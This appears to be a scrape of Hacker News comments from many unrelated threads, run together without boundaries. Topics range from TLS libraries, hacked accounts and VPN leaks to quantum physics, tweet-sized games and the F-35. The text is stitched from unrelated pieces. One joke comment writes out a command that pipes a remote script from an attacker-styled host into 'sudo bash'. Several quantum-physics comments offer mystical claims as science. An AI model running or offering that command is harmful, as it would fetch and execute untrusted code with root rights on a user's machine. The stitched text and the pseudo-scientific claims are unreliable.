OCaml TLS: ~4400 LoC
OCaml X509: ~1550 LoC
OCaml ASN1: ~1400 LoC
OCaml nocrypto: ~5250 LoC
The fact that they are focusing on the TLS protocol itself and not the actual encryption implementation is a good way to start; the "extraneous complexity" is not really in algorithms like RSA/ECDSA/AES since those are specified mathematically, but in the handling of the protocol messages and states. That is also where most of the bugs tend to be.
It reminds me of this Hoare quote: "There are two ways of constructing a software design: One way is to make it so simple that there are obviously no deficiencies and the other way is to make it so complicated that there are no obvious deficiencies."
My biggest issue with OpenSSL is that it also tries to do IO, but does it in a way that is neither performant nor cross-platform.
Anyone else think this was a contraction of the a11y, i18n, a16z or f6s variety?
More than that though, I think Sampras's words ring true regardless of your occupation. Don't sweat the small stuff, celebrate every success, appreciate the people you have in your life.
Great way to start the day.
I would add that it is also worth reading Agassi's biography (Open: An Autobiography).
Together, these books provide a unique insight into life at the top of the game - and the impact this has on their lives. As a bonus, the views are from two players who were very different characters, were viewed in the media as being very different, and brought the best out in each other.
Tennis always seems to have more than its fair share of real gentlemen, and Pete is front and centre amongst them.
NFL players listen to this man.
So true in life..
In summary, for an app with a bug, you must know (a) an input that causes the bug to show up, and (b) an input that doesn't cause an error. The tool then looks for similar code on GitHub and tries inserting the checks done by that code into the buggy code. Then it reruns the program, hoping that the bug is resolved.
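A minimal Python sketch of that loop, with every helper name made up (the real CP system from the paper is far more involved):

  # Hypothetical sketch of the code-transfer loop described above; all helpers are invented.
  def transfer_fix(program, crashing_input, benign_input, donor_candidates):
      assert runs_ok(program, benign_input)           # (b) known-good input
      assert not runs_ok(program, crashing_input)     # (a) known-bad input
      for donor in donor_candidates:                  # e.g. similar code found on GitHub
          for check in extract_checks(donor):         # guards/validations in the donor code
              patched = insert_check(program, check)
              # keep the patch only if it fixes the crash and breaks nothing
              if runs_ok(patched, crashing_input) and runs_ok(patched, benign_input):
                  return patched
      return None                                     # no transferable fix found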
This approach is very cool, and harnesses the power of lots of developers. But it's also very limited. However, that's what research is for. Small steps together are a big leap for mankind :p
I also like this conclusion in the article:
"""In recent years the increasing scope and volume of software developmentefforts has produced a broad range of systems with similar oroverlapping goals. Together, these systems capture the knowledgeand labor of many developers. But each individual system largelyreflects the effort of a single team and, like essentially all softwaresystems, still contains errors.We present a new and, to the best of our knowledge, the first,technique for automatically transferring code between systems toeliminate errors. The system that implements this technique, CP,makes it possible to automatically harness the combined efforts ofmultiple potentially independent development efforts to improvethem all regardless of the relationships that may or may not existacross development organizations. In the long run we hope thisresearch will inspire other techniques that identify and combine thebest aspects of multiple systems. The ideal result will be significantlymore reliable and functional software systems that better serve theneeds of our society."""
Edit: this one is open source; is the MIT one? I couldn't find references on the page.
But seriously: autogenerating fixes as observed by fuzzing does sound cool.
> An Obama Administration official tells Re/code that recent advances in using automated methods to analyze software code for vulnerabilities have spurred interest in government circles to see if there's a way to standardize how software is tested for security and safety.
I just wonder what will happen to Google's Project Vault now that Mudge is gone. Hopefully it will still be on track.
The first step would be to edit the title of your submission to begin with "Ask HN: hacked Google account, what to do?", since you're asking a question.
"Google hacked account" means, to an English speaker, that Google perpetrated hacking against some account somewhere. E.g. Google people gained access to your bank account. I.e. your current submission title is clickbait.
Additionally, you have to track every change with a timestamp so that you can invalidate everything that came AFTER the change you just reset. That will prevent a hacker from being able to screw with the account, because the original email address will also be able to cancel future changes, no matter how many times the perpetrator makes them.
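A sketch of that bookkeeping, purely illustrative (the structure is invented; this is not how Google actually implements it):

  import time

  change_log = []  # append-only list of (timestamp, field, old_value, new_value)

  def record_change(account, field, new_value):
      change_log.append((time.time(), field, getattr(account, field), new_value))
      setattr(account, field, new_value)

  def reset_after(account, cutoff):
      # Undo every change made after `cutoff`, newest first, so the original
      # owner can cancel anything the attacker did later, however many times.
      for ts, field, old_value, _ in sorted(change_log, reverse=True):
          if ts > cutoff:
              setattr(account, field, old_value)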
The prospects for the rest of us are fairly bleak.
Did you set the recovery email the same as the main email? Cause I only get password reset to the recovery email.
If you used the same address for recovery email, then it defeats the whole purpose
I'm hoping you'll say no, because my feeling of security comes from the fact I've enabled two-step verification.
Email is the most sought after account. All the password reset requests to your Bank, Twitter, Facebook, etc. are delivered to your email account. So when someone steals your email account, they've stolen all the others too. Go change those accounts to use your new email (if you can).
It is not difficult to do without them.
Asking for help on HN or Reddit works sometimes, but if your business (or personal life for that matter) relies on their services you should really work towards being able to do without them.
Unfortunately, it's a tough situation, since for all Google (or we) know, you could be the hacker trying to get into the account, and it's hard for them to verify who you are. If the hacker was able to steal the person's phone to bypass two-factor authentication, they may also have a copy of your driver's license or ID to send to Google in an attempt to verify they are you.
While far from ideal, assuming you don't have a close friend who can contact Google for you via their Google Apps admin account, you could create a new trial Google admin account and then contact Google through that, explaining the situation with your other account. While they will still have to find a way to verify who you are, at least you'll reach a real person.
On the other hand, it is a free service. If you had the business subscription, they do have a helpdesk you can contact by phone: https://www.google.com/work/apps/business/support/
I believe I can help.
It appears I'm not the only one:
> Solarized is a sixteen color palette (eight monotones, eight accent colors) designed for use with terminal and gui applications. It has several unique properties. I designed this colorscheme with both precise CIELAB lightness relationships and a refined set of hues based on fixed color wheel relationships. It has been tested extensively in real world use on color calibrated displays (as well as uncalibrated/intentionally miscalibrated displays) and in a variety of lighting conditions.
I'm assuming this means it's giving a criterion to "measure" how good it is in a not-entirely-subjective-way. That always bothers me about selecting a theme. I have no idea if it's good or bad in any standard measurable way.
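That CIELAB lightness claim is actually one of the few checkable ones. Here's a quick sketch of the standard sRGB to CIELAB L* conversion; the printed values line up with the evenly spaced L* steps Solarized documents for its base colors:

  # CIELAB lightness (L*) of a hex color, the "not entirely subjective" metric
  # Solarized was designed around.
  def lightness(hex_color):
      r, g, b = (int(hex_color.lstrip('#')[i:i+2], 16) / 255 for i in (0, 2, 4))
      # sRGB -> linear RGB
      lin = [c / 12.92 if c <= 0.04045 else ((c + 0.055) / 1.055) ** 2.4
             for c in (r, g, b)]
      # linear RGB -> relative luminance Y (D65)
      y = 0.2126 * lin[0] + 0.7152 * lin[1] + 0.0722 * lin[2]
      # Y -> CIELAB L*
      return 116 * y ** (1 / 3) - 16 if y > 0.008856 else 903.3 * y

  for name, hx in [('base03', '#002b36'), ('base0', '#839496'), ('base3', '#fdf6e3')]:
      print(name, round(lightness(hx)))   # -> 15, 60, 97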
I look at these themes and can't really tell what their "unique properties" are, or anything interesting about them, just by looking.
I love the Tomorrow-Night theme:
On Github: https://github.com/chriskempson/tomorrow-theme/blob/master/v...
Whoever solves that problem earns a raise
Solarized is too low-contrast for me, so I have hacked-on support for hybrid (Solarized syntaxes + Tomorrow color codes), but it's not really uniform. And, IMHO, well-balanced contrast is the most important thing.
Non-exhaustive list of applications that I'd like to see supported - vim, emacs, tmux, weechat, vifm, newsbeuter, taskwarrior, mutt...
Then when I go inside/outside again I have to switch it all back. Quite a hassle. Has anyone found any trick to automate this? For starters I wouldn't know how to change the colorscheme of all my Vim sessions. Can you send a signal to your Vim sessions maybe? Then changing the terminal colorscheme is of course dependent on the terminal app you're using.
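For the Vim part, something like this might work (untested sketch, assuming Vim is built with +clientserver and each instance was started with --servername):

  import subprocess

  def set_all_vim_colorschemes(scheme):
      # list running Vim servers, then push a :colorscheme command to each
      servers = subprocess.run(['vim', '--serverlist'],
                               capture_output=True, text=True).stdout.split()
      for name in servers:
          subprocess.run(['vim', '--servername', name, '--remote-send',
                          '<Esc>:colorscheme %s<CR>' % scheme])

  set_all_vim_colorschemes('solarized')  # or your outdoor scheme when heading outside

The terminal side would still need per-terminal handling, as you say.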
> "[VPNs are] used by around 20 per cent of European internet users they encrypt users"
I think it is more like 2%. I don't know anyone but me who uses a VPN. I'd even say that if I picked 100 people I know, fewer than 20% would know what a VPN is.
Furthermore, the article makes IPv6 sound bad. If I didn't know what IPv6 and VPNs are, I might think IPv6 is bad, too. I'm also interested in knowing which VPN software they tested. While I'm certain that old VPN software leaks IPv6 addresses, I can't say that for the VPN software I use: OpenVPN (on Linux, and Tunnelblick on Mac) and Mac's built-in VPN software (which supports L2TP over IPsec and PPTP). It is really a shame, though, that my VPN provider does not support IPv6 yet.
The only thing that really leaks my real IP is WebRTC. Thanks to WebRTC, everyone can see my real IP address, and I can't disable it in Google Chrome. If you want to check what information your VPN is leaking, check out: https://ipleak.net/
Even if they weren't, I fully agree with progressive enhancement. It is always going to provide the right incentives for everyone. Only the features most used (by end-users) will become browser vendors' utmost priority.
If you're interested in porting your binary to Linux/Mac/SteamOS using a Wine wrapper, throw my company an email. That's exactly what we do :)
The page has a lot of graphics and characters using strikethrough which confused me and looks somewhat unprofessional. I suspect the author might be losing conversions due to the complexity of this page. I would prefer a simpler buy page that put the actionable content right at the top. (I'm just looking for a regular commercial-type purchase of an early access game, not being a backer per se.)
I'm sharing this as constructive feedback in the hope the author might see it. A customer like me will appreciate a simpler, direct buy page that doesn't require a lot of thought from "oooo this looks fun" to making the purchase. Capitalize on impulse buys coming out of your demo.
Anyway, very polished and fun from the few minutes I've had to play it so far. Nice work!
This game is easily as polished as, or more polished than plenty of games on Steam Greenlight. Steam was the first place I looked for it, actually, after reading the article. A game like this should attract huge interest among the right audience if it's replayable. You have flashy and normal enough graphics with an easy-to-understand interface that regular gamers can enjoy it, and it also seems like it will appeal to the hardcore roguelike gamers. I'd highly recommend you try to get it on Steam as soon as you think it's ready (speaking as a person who makes a lot of video game purchases on Steam and not many outside it).
Then I remembered the general problem with commercial games.. went straight to the FAQ and searched for "linux".. bummer.. I guess somehow I expected a roguelike to work on Linux :)
I will keep an eye on the game, and hopefully someday a Linux version will emerge. Good luck on your quest as an indie dev!
This is meant as sincere constructive critique, so feel free to downvote ad libitum.
When I have the spare funds I'll be sure to pick up a copy!
This helps a lot though, so I think I'll be back on after work tonight to put some more polish on!
First, "realism"  is not the same thing as "reality". "Realism" basically means "physical quantities have a definite value". "Reality" is that thing that determines your experimental outcomes. Don't mix them up.
Second, interpretations of quantum mechanics disagree wildly about what kind of weird you use to explain things. Some interpretations have "realism", some don't. Some interpretations have retrocausality, some don't. Some interpretations have FTL effects, some don't. Since all the interpretations give (mostly) the same experimental predictions, it's misleading to single one out and say just that particular brand of weirdness was confirmed.
We confirmed that there's weird there. We didn't distinguish what brand of weird it is. Physicists widely disagree about which brand of weird to use, with no position achieving even a majority. The original title was better.
The properties these experiments are measuring are simply bogus. They are not well defined. The answer that comes out is not some intrinsic property of the "particle", but the result of the environment in which the particle interacted with the "measurement" system, so to speak.
The particle has some other properties, but what's being "measured" is not one of those properties.
How can I explain?
Imagine someone who has never tried any Korean food, and you try to ask him/her: what's your favorite Korean food? There's no answer. So you try to "measure" it by feeding him some Korean items and recording his facial expressions. He will like some items more than others, but it has nothing to do with "his favorite Korean food", and has more to do with how the items were prepared and his mood at the time.
A "point" location for a photon is never defined; it's not a property of a photon that it exists in a point in space. When you fire a photon at a "wall" and see a "blip", you're not seeing the position of the photon at some point in time. You're seeing the rough position of the atom that had an electron that absorbed the photon's energy, and I'm not even sure the atom has a well defined point position either. The whole thing is an artifact (a side effect) of some interaction between several systems and doesn't really tell you anything fundamental about the photon (or the quantum object).
At least that's how I understand it.
Maybe this is really just a fundamental challenge to our assumptions about motion of particles or information transfer in the universe. Isn't that interesting enough without these vague, human aggrandizing assertions about creating reality?
COMPUTER SIMULATION vs HOLOGRAPHIC UNIVERSE
This is something that I've thought about for some time, I posted a question about this a number of years ago on Reddit: http://www.reddit.com/r/Physics/comments/g287k/quantum_indet...
So does a thing which is not affecting anything else and not being measured exist? No! QED
So much physics reporting mistakes science for philosophy. It leads to so much confusion among laypeople.
It seems like at least Philosophy 101 should be mandatory for quantum physicists.
Reality doesn't depend on an observer (who distorts it by his observation). Reality just is.
There is light, and other temporary states of what we call "energy". That's it. Time, space, and relativity are human concepts - the hard-wired modes of perception which condition our experience. From a photon's perspective, none of these exist.
The non-interference pattern is the optimized result of a deterministic universe that requires the observation to occur. The measurement didn't reach back in time; the results were determined by the same causal chain that determined an experiment would be performed.
Essentially, we're all watching our own multi-dimensional, multilayer, composite TV channels and seeing shadows of each other across our screens. Allegory of the Cave meets 3D Ray Tracing and such.
That's nothing, though. Not compared to the realization that every face is a mirror, and we're all stuck here until we can treat each other as ourselves.
Maybe it's not true, maybe it's insane ramblings. But it does explain the crazy doods muttering to themselves on the corner and those people in your life who "just aren't watching the same channel as the rest of us."
A layman-friendly article/interview: https://www.quantamagazine.org/20150604-quantum-bayesianism-...
This understanding is in line with this experiment without believing that the future affects the past. It's just that the atom is never a particle until it reaches the detector at the end. Only there does it display the ability to exchange momentum with one other single atom, as if two billiard balls collided. Throughout the whole experiment it travels as a wave, along both paths, grating or no grating. It simply interferes if there was a second grating, and doesn't if there wasn't.
Also the deference to the Copenhagen interpretation is annoying - it's wrong. What they've observed is a consequence of how decoherence works, and 'observation' has nothing to do with it. Not faulting the researchers on this but seriously, it's time to stop talking about mythical 'observation' as though it's some integral part of quantum theory.
It could mean that time on quantum scale doesn't differentiate past/future.
I'd like to issue a pull request..
Does measurement have to include an agent? Could measurement mean interaction with other atoms?
What is the conclusion if you are the thing being observed?
Sounds like that light existed, and generated and responded to a gravitational field, after it was emitted and before it was detected or measured.
Is that equivalent to "reality doesn't exist until it is measured"? Because I don't see the latter claim (which is the headline on HN) anywhere in the text?
Also, didn't Feynman explain in QED that it's not either a wave or a particle - it's always a particle, and the probabilities for the path the particle takes behave like waves? (Something like that; I am foggy on the details.)
The paper is at http://www.nature.com/nphys/journal/vaop/ncurrent/full/nphys.... We changed the URL of this submission from http://www.independent.co.uk/life-style/gadgets-and-tech/new....
"Measuring" is applying our sensors onto the external reality and producing a map of what is observed in the form of thoughts, ideas, imagery - 'perception'.
But since the sensors are also part of reality, which does not exist before sensing it, it can be postulated that what is perceived is not a consequence of reality hitting the sensors, but the result of a new thought about reality being perceived, or simply - an invention.
That is, reality (including your body, brain and you) is the product of a thought process, but (here's the interesting part) the thinker is you and not you at the same time, or rather - the thinker is you and every other being.
That thinker is called God. Or Universe or whatever you want to call the thing or being that is the eternal recursive loop of self-invention / self-perception.
Of course very hard to put into language, but easily grokked under psychedelics.
It's interesting that science (and math) is slowly pointing towards this conclusion too, a thing that many great scientists arrived at intuitively.
The tour costs around $100 and includes "medical insurance" from the government.
There was a documentary (from ~2008) about the red forest: vets, biologists, and oncologists investigating the state of life there. Plants and animals came back. They (and I) expected crippled, mutated species, but so far they were fine. The claim was that after a few years, species resistant to the current radiation levels survived - X-Men, Bambi edition - leaving me wondering how much we could learn from that about the resilience of nature and life-forms, assuming these claims are correct and solid.
Because it has the chemical properties of calcium, it can participate in your metabolism and remain in your body (bones), constantly irradiating you.
I really should setup my gmail account in mutt, it could save me a lot of alt-tabbing time.
It has been pretty neat to see the revival of these machines in the last two decades - and the scene producing new titles for them is made up of pretty neat folks: computing purely for the love of it, producing titles of such brilliance that one could only have wished it had happened 30 years earlier.
.. and the Impossible Mission .TAP file:
"Stay awhile! Stay FOREVER!!!! Hahahaha ..."
(More great Oric titles, along the lines of the 80's classics like IM and more, available here:
If you love Impossible Mission, check out SPACE 1999, SKOOL DAZE, DON'T PRESS THE LETTER Q, and more!)
(sortable, filterable, searchable)
Imagine breaking an image down into pixels, actually storing them into a database, performing some queries, and outputting the result. Something equivalent to that (sans database) sounds interesting to me.
PixQL: SELECT WHERE COLOR = #FF0000FF; OPERATE SET COLOR = #00FF00FF
JS:    if (rgba=='FF0000FF') rgba='00ff00ff'

PixQL: OPERATE SET G = R
JS:    g=r

PixQL: SELECT WHERE ROW % 100 = 0 OR COL % 100 = 0; OPERATE SET COLOR = WHITE
JS:    if (!(row%100) || !(col%100)) rgba="ffffffff"
It seems like the image equivalent of treating an HTML file as a huge string of characters -- instead of as the representation of a DOM tree. Which makes very little sense.
Plus, you seldom want to do trivial things like selecting red pixels and flipping their color to green. You want to select red eyes and flip those to their correct color.
"But in photoshop, I instead am relying on the problem being solved externally ("ok, how can I find the right menu that deals with this kind of operation? what's the word the designers of photoshop used to describe this... I hope if I google it in plain text it might link to a forum post or something of someone with the same problem?")."
This is valid for most cases when GUIs are harder to use than a CLI with syntax.
- show it on http://www.reddit.com/r/tinycode/
- if you aim for low character count instead of low byte count, you can pass your code through my unicode packer here: http://xem.github.io/obfuscatweet/
- Golf your code even more (using the tips of the other comments), and use all the remaining chars to add features to your game and fill the 140 chars of a tweet :)
Depending on how much you cheat, you can get about two bytes of data per Twitter character. That'd allow 256 bytes of game to live comfortably within a single tweet, which is a quarter of an unexpanded ZX81's RAM. By comparison, that would take almost ten seconds to load off tape. You should be able to get a respectable ZX81 game in that.
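A toy version of that packing, for the curious (the base code point is an arbitrary choice; real packers like the one linked above are cleverer, and whether Twitter counts astral characters as one is its own question):

  # Pack two bytes per Unicode character and unpack them again.
  BASE = 0x10000  # supplementary plane: 0x10000..0x1FFFF avoids surrogates and controls

  def pack(data):
      if len(data) % 2:
          data += b'\x00'                      # pad to an even length
      return ''.join(chr(BASE + (data[i] << 8 | data[i + 1]))
                     for i in range(0, len(data), 2))

  def unpack(text):
      out = bytearray()
      for ch in text:
          v = ord(ch) - BASE
          out += bytes([v >> 8, v & 0xFF])
      return bytes(out)

  assert unpack(pack(b'ZX81!!')) == b'ZX81!!'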
Here's a 2048/Threes clone in <700 characters (or 5 tweets): https://twitter.com/eigenbom/status/615424395192877056
curl http://www.hackerz-r-us.ru/really_awesome_game.sh | sudo bash #YouveBeenP0wnd
(Concept inspired from Jennifer Dewalt's project, but code is entirely mine :))
Most of these would also fit in a single tweet ..
Because it's supposed to be able to dogfight, its other capabilities have been compromised. Now we find out that, as everyone knew, it can't dogfight. So why even design it to do a mediocre job of dogfighting when they could instead eliminate that design constraint and allow it to do its other roles better?
The simple fact is that the military has tried to bite off more than it can chew by asking that the F-35 can do everything at once. Because the F-35A is slated to replace the F-16, other sacrifices have been made to make it sort of approach being kind of nearly as capable as the F-16. As a result, it is doing its other roles worse than what would be the case if the military instead accepted that one size does not fit all and removed that requirement.
Frankly, it doesn't matter how unrealistic the idea of dogfighting is. The military said 'make this thing able to dogfight at least equivalently to the F-16' so LM have gone away and made specific design decisions to try to achieve that. It's now fallen short of that target, and in doing so has also compromised other capabilities.
According to Aviation Week, a reputable defense and aviation source, the F-35 has been doing loading tests. Meaning that if this report is accurate and the dogfight happened, it pitted an electronically limited F-35 against a platform that is very mature and whose limits are understood. Here's a link to the story in question: http://m.aviationweek.com/defense/f-35-flies-against-f-16-ba...
Three Danish defence experts pointed out that while the F-35 is the most advanced plane "available", it doesn't matter. Dogfighting is out of date, but the high tech is equally useless: neither Denmark nor the US has been in a conflict since WWII where the advanced features of the F-35 would have made any difference.
Unless you decide to go to war with Russia or maybe China, the F-35 is so far beyond what you would reasonably require that the cost is completely unjustified.
Sadly for Denmark, we pissed off Saab, and they will no longer bid to deliver planes to the Royal Danish Air Force, despite having a suitable plane.
Cost, conflicting interests, technical challenges and secrecy requirements in the worst possible package.
A Tomahawk missile costs about $575k per unit; that lets you buy about 1.7 million Tomahawks for $1 trillion. If you built a drone version that could loiter over enemy airspace and then attack - sort of a Tomahawk version of the Predator - you could buy a hundred thousand of them even if they were $10 million apiece.
You could also build UCAV fighters that could out-turn and out-fly most fighters by avoiding the overhead of a cockpit and the g-force restrictions of a pilot. Missiles make 40g turns, and drone airframes have been built to sustain 12-15g turning.
Are we spending a trillion dollars because the Air Force has a romantic notion of a human dogfighter in the seat, when a guy with a joystick could do the job? Top Gun is a lot less interesting if robots or teleoperation are in play, but do we really need that kind of engagement?
I think the close combat air support / tactical role should be given back to the Army (changing Johnson-McConnell agreement of 1966 and Key West Agreement) and the Air Force can deal with strategic bombing and air dominance.
The Air Force has been trying to get rid of the A-10 with various excuses, but the GAO recently said their budget reasons were bunk. They just don't want the job, and the loiter time of the proposed replacements is pathetic.
The highlight for me is the last line:
The fact that the F-35 is maybe not really a good fighter at all is reminiscent of the question that we've been asking for years: if you don't really need competitive maneuverability, then why do we need a fighter at all?
Here's what a Eurofighter test pilot had to say about the F-35 kinematics claims:
We have clearly shot past the point where anyone would dare risk employing the F-35 in any combat role.
The F-35A is expected to match the F-16 in maneuverability and instantaneous and sustained high-g performance, and outperform it in stealth, payload, range on internal fuel, avionics, operational effectiveness, supportability, and survivability. It is expected to match an F-16 that is carrying the usual external fuel tank in acceleration performance.
The A variant is primarily intended to replace the USAF's F-16 Fighting Falcon.
While there is some romanticism still attached to fighter pilots the truth is in this day and age their relevance is dropping like a rock and there is little need to put pilots into danger when a drone can do the same.
Plus, drones can be built to do all sorts of maneuvers human pilots never could - not to mention reducing the size of the craft to make it less visible.
A trillion f'ing dollars!! For that amount, you could fund 1000 startup companies a million dollars each to develop their best fighter, stage a knockout tournament until you have whittled it down to the 15 best designs, and still have $999 billion to spread among the surviving designs.
Oh, your war drones have humans strapped to them...how quaint. --Some future general
The claim that "the helmet was too large for the space inside the canopy to adequately see behind the aircraft" is quite strange. Despite developmental issues, the F-35 Head-Mounted Display has been completed and displays imagery in a complete sphere (4π steradians) from the aircraft's Distributed Aperture System. Additionally, the F-35 has a somewhat roomier cockpit than the F-16, though rear visibility is more obstructed.
The control systems are still being tuned to some extent as well. The F-35 is fully fly-by-wire, and it tries to make sure the aircraft can't be overstressed or stall, but these limits can be too conservative. I'm not claiming that maneuverability will drastically improve, but this is one of the many objectives of testing.
I can almost understand why the new jet is having a hard time replacing the previous one. I say almost because at a trillion dollars... Lol
But then the F-35 is supposed to be stealthy so might be able to attack from a distance with relative impunity.
Pierre Sprey, co-designer of the F-16 and A-10, speaks about the F-35 - specifically about dogfighting at 04:00 and stealth capabilities at 06:00 in the video: http://www.dailymotion.com/video/x203cgj_pierre-sprey-co-des...
Given the design freedom with multiple airframes, I would think it quite hard to outdo such divergent airplanes as the F-16 and A-10. Unless the spare-part situation is crippling, conservative design would be to tailor to individual roles. Call it a Unix approach to air combat?
1 Trillion dollars for a shit plane...but we can't afford to take care of the veterans and retirees.
It seems like he's pretending that we have, or will have, no other fighter jets remaining.
The F-35 is not designed for dogfights but for long-range missile fights and stealth.
>the Air Force organized specifically to test out the F-35's prowess as a close-range dogfighter
They fail to mention that dogfighting is as antiquated as Snoopy and the Red Baron. Talking about this test without the context is plain irresponsible.
Modern air superiority strategy is about delaying detection with stealth, combined with advanced electronic warfare and coordinated intelligence suites, to destroy the enemy before he even sees you - or at least when it's much too late to have any meaningful response. It isn't "perfect" stealth, but it doesn't need to be. You just need to get close enough that your missiles get where they need to go, opening up the theater for other assets to do their thing.
"Too close for missiles, switching to guns" is ancient history.
The F-35 is no good at dogfighting because it wasn't designed to be, the test was just something you do to test your outer limits. "Failing" isn't failure.
I'd rather see a swarm of drones one tenth the size and one twentieth the price fight our dog fights.
You can't see behind the F-35, even if you turn your head; the central lift fan is in the way. There's a rear-view camera because of that.
It's odd, then, that a pilot says he can't turn his head and see well.
God, I love bureaucrat-talk. It's a pig. A trillion-dollar pig. But that doesn't mean we can't put lipstick on it!
Last time this came up on HN, somebody recommended reading about the life of John Boyd. For those of you interested in how large systems of people operate, how the Pentagon ends up with bad airplanes, principles of organization change, and the philosophy of strategic planning? Go read as much as you can. Boyd was no Sun Tzu, but he significantly advanced the state-of-the art in a bunch of seemingly unrelated fields. I have a feeling we'll be parsing some of his stuff over the next few decades.
Aside from providing promotions to large sections of the officer corps and gainful employment to many large defense contractors in the districts of various politicians, I'm not sure what the F-35 is actually for. It's like the Space Shuttle: it's supposed to do so many contradictory things at the same time that it doesn't seem to do any of them well.
In fairness, the Osprey tilt-rotor had a lot of the same types of procurement and delivery problems. Anybody remember vortex ring state? But the Osprey at least had somewhere it was going: take a squad of marines or special operators far inland, as fast as an airplane, without using runways at either end. It looks like the Osprey is turning the corner and can finally deliver the goods.
Not so much with the F-35.
I'm not sure what to do with the program now. My instinct says keep the close air support and air superiority fighters we have and concentrate on the F-35's stealth capabilities. But strategically, once somebody figures out how to use passive radiation to paint and plot airborne targets? The stealth game is up. Required computing power may be a decade or two away, but it's well within the expected lifetime of the airframe. I think maybe you just bail out on the whole thing and go back to strategy school.
When you think about the current situation in Iraq, one might argue that it would not necessarily be a bad thing.
EDIT: this, for instance, seems much more interesting: http://www.fool.com/investing/general/2015/02/22/us-navy-to-...
But it's hard to see how dogfighting prowess would be any help against long-range radar systems that can detect it before being in range.
They're not settling with $1M donation to EFF, they're still getting $2.1M from Lovely.
"... this was decided by the supreme court definitively in unanimous decision regarding, for instance, phone numbers in the case Rural v. Feist (http://en.wikipedia.org/wiki/Feist_v._Rural) ... The facts are just facts. They are not creative expressions. They are descriptive information and as such are outside of the bounds of what copyright law was intended to cover.
... In other industries it is a long-standing practice of comparing prices, supply and demand. My background at the federal reserve tells me, thats how markets work. The concept, that it is intellectual property, when its really just transparency of price, supply, and demand, and thats how markets work, is a real stretch. Its something that could, if it continues to go this way, it could, basically, break the Internet, where you have to have permission to compare prices, and compare supply and demand between different sources of goods and services.
.. We just think that the business of on-boarding the postings and charging for it is entirely different from the search and downstream interaction."
That reminds me of a comment from when smart TVs were discovered to be sending filenames and other info, since it was sent in plaintext: "If they had used HTTPS, this might not have been discovered."
The most important thing to realise is that security can work for you, and it can also work against you. It's not only a "right to eavesdrop", but users will need to maintain control over their devices if they want the former. This is somewhat related to the War on General Purpose Computing, and what I think is the biggest dilemma is that users need to have a certain level of knowledge in order to understand what their devices are doing and control them; but many don't want to; they only see the advantages and don't care about how something works, whether it "phones home" or what kind of data it's sending, as long as it makes something in their lives easier.
News stories about how smart TVs phone home have circulated, and yet AFAIK people are still buying them in great quantities. They just don't care. They are outraged and shocked when the news appears, but shortly afterwards they carry on as if nothing happened. That, I think, is the scariest part.
2. I'm not sure that communication transparency is what led to the success of PCs, smartphones, and the Web. Perhaps the Web, but definitely not smartphones. People had to fight tooth and nail for the right to root or jailbreak their own phones!
3. How do you add the ability to eavesdrop on a device without compromising TLS or adding a remote back door that anyone could exploit? The only way that I can think of, and the only way that this has traditionally been done with PCs, is to give local root to the owner.
If the owner has root, then he can make the device trust his own certificate and proceed to MITM it with his own router. But an owner with root can also modify the device's "firmware" to make it behave in ways that the manufacturer never intended, and manufacturers will do everything in their power to prevent this. Nobody wants to admit that they're actually selling general-purpose computers.
If the manufacturers are not going to cooperate (and I don't think they will), then perhaps what needs to happen is that we should start rooting/jailbreaking every smart device we can get our hands on, and thereby force them to be transparent. It can't be that difficult, after all. Where are all the clever folks who helped root and jailbreak our phones? Let's send them some TVs to play with, warranties be damned. Perfect security doesn't exist, and we can use that fact to our advantage.
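As an illustration of how simple the inspection step becomes once a device trusts your CA: a minimal mitmproxy addon (a sketch, assuming the device is routed through the host running mitmproxy - which is the hard part):

  # Log every request a "smart" device makes; run with: mitmproxy -s this_file.py
  def request(flow):
      print(flow.request.method, flow.request.pretty_url)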
To be specific, it maxes out the CPU even when it's not doing anything. Given that it's supposed to emulate low-level hardware, at very slow speeds, and does not have any demanding graphics, I fail to see why it should do that.
(It's something I've seen happening in more games as of late, actually. For example, Desktop Dungeons - a very fun game which has no business demanding anything from my computer, since it's turn-based, uses sprites, and is barely animated. And yet my laptop heats up as soon as I open the game.)
In fact, it's a bit ironic, given that the whole theme of the game is squeezing performance out of bare-metal hardware, and I admit I'm more annoyed by it for that somewhat irrational reason.
(I get a bunch of errors on OS X unless I change "CC=gcc" to "CC=clang", btw)
 https://en.wikipedia.org/wiki/PIC_microcontroller https://en.wikipedia.org/wiki/Charge-coupled_device
From what I've understood, operators will reintroduce wholesale roaming prices, which means that the home operator will still pay for traffic while their clients are roaming.
This will bring us cheaper roaming, but we will most likely have two separate packages: one for domestic use and a capped one for roaming.
Roaming surcharges will be banned in 2017, and from April 30, 2016, they will be capped at a maximum of €0.05 per minute for calls, €0.02 per SMS and €0.05 per megabyte for data.
Then the iPhone came out, and an unlimited international data plan was an additional $60/month, I believe. Basically doubling the monthly cost, and that didn't have tethering.
THEN, they got rid of that altogether, and ever since it's been a scramble in every country to buy a SIM card just to pay local rates and not get ripped off. It's all the same internet; if you're not at home and roaming agreements exist, the carriers should just be forced to pay each other fair rates.
To be honest, I can't back this up with arguments and/or data, but this is what I heard from telecom specialists in the field.
Hell, KIF even forced you to make sure you had accessibility strings on stuff like icons and shapes. Looks like this continues on the same path.
Regarding "There is currently no way of waiting for elements to appear or disappear."
I haven't tried this, but maybe you could just wait with a condition? https://gist.github.com/seivan/0becfffbb1d7665cebfe
Or use the XCTestExpectation stuff that came with iOS 8. https://gist.github.com/seivan/d2dee9fcff0177cb3b93
No kudos for presentation. I've tried to look at two works, typewritten MSS by Vachel Lindsay and Sara Teasdale, and the text display is awkward. The initial presentation is too small to read. Looked long for a zoom control. Finally tried "full browser" link which does display the current page with a zoom control and the ability to drag that page around in a small frame to read it.
While it is nice that UT is doing this, it is sad that each uni has to do its own thing. Can there be no one virtual repository where all such collections -- or at least their catalogs -- could be amalgamated? It's like the bad old days of physical libraries: the scholar has first to find out which collection has the thing she needs, and may never learn that it exists. If they don't want to deal with google books, how about using TIA as a front end?
Edit: ...and then I looked at the URL, hrc.contentdm.oclc.org and thought, huh, that doesn't look like UT or EDU... turns out oclc.org is something like I was just asking for, a front end content distribution platform for multiple libraries. OK then. TIL and all that.
One example I think is pretty interesting is Island Newspapers  where they have scanned every issue of a newspaper in PEI, Canada called the Guardian going back to 1890.
The Django app and libraries running the site are built and maintained in-house, and are open source:
https://github.com/unt-libraries (the Django project/app itself is 'coda')
Direct link to the collections: http://hrc.contentdm.oclc.org/#nav_top
Getting out of display media for them is smart. Fundamentally they are a software company and there are already players that sell media better than they can. It isn't a software problem, it's about building sales relationships with media agencies.
A streamlined P&L and staffing strategy will let them focus on making a developer-centric product company. They will still make plenty of ad money, but don't have to staff for it.
